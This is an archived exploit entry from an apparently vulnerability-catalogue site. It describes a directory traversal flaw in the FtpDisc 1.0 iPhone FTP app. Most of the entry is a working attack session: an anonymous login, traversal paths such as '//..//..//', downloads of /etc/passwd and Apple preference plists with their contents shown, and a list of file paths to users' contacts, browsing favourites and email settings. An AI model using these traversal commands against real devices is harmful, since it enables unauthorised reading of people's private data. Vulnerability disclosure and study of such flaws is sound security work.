Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

iOS FtpDisc 1.0 - Directory Traversal

🗓️ 22 Feb 2011 00:00:00Reported by R3d@l3rt, Sp@2K, SunlightType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 19 Views

FtpDisc v1.0 iOS Directory Traversal Vulnerabilit

Code
# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal 
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight
# Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the FtpDisc.  
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 Mocha FTP Server
User (192.168.0.70:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 documents
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 other
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 photos
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 video
226 Transfer completed
ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec.
ftp> cd //..//..//..//..//..//..//
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
-r-xr-xr-x   1 nobody    nobody      0          Aug  3  201012:41 .file
dr-xr-xr-x   1 nobody    nobody      1428       Feb  8 12:50 Applications
dr-xr-xr-x   1 nobody    nobody      68         Aug 19  2010 4:10 Developer
dr-xr-xr-x   1 nobody    nobody      884        Jan 12 12:53 Library
dr-xr-xr-x   1 nobody    nobody      102        Aug 19  2010 4:18 System
dr-xr-xr-x   1 nobody    nobody      306        Feb  8 11:48 User
dr-xr-xr-x   1 nobody    nobody      2074       Jan 13  9:52 bin
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 boot
-r-xr-xr-x   1 nobody    nobody      638        Jan 25 15:30 control
dr-xr-xr-x   1 nobody    nobody      68         Aug  3  201012:41 cores
   1 nobody    nobody      68           1  dev
dr-xr-xr-x   1 nobody    nobody      918        Jan 26 11:34 etc
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 lib
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 mnt
dr-xr-xr-x   1 nobody    nobody      136        Oct 23  201015:12 private
dr-xr-xr-x   1 nobody    nobody      1666       Jan 13  9:52 sbin
drwxrwxrwx   1 nobody    nobody      272        Feb 22 16:02 tmp
dr-xr-xr-x   1 nobody    nobody      374        Jan 13  9:52 usr
dr-xr-xr-x   1 nobody    nobody      1088       Oct 26  2010 1:19 var
226 Transfer completed
ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT command successful.
550 cannot find the file
ftp> get /../../../../../../etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /../../../../../../etc/passwd
226 Transfer completed
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
200 PORT command successful.
150 Opening ASCII mode data connection for //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
226 Transfer completed
ftp: 1239 bytes received in 0.00Seconds 1239000.00Kbytes/sec.
ftp> quit
221 Goodbye

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.Maps.plist
bplist00?

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Feb 2011 00:00Current
7.4High risk
Vulners AI Score7.4
ftpdisciosdirectory traversalvulnerabilityexploitftp serversecurity document
19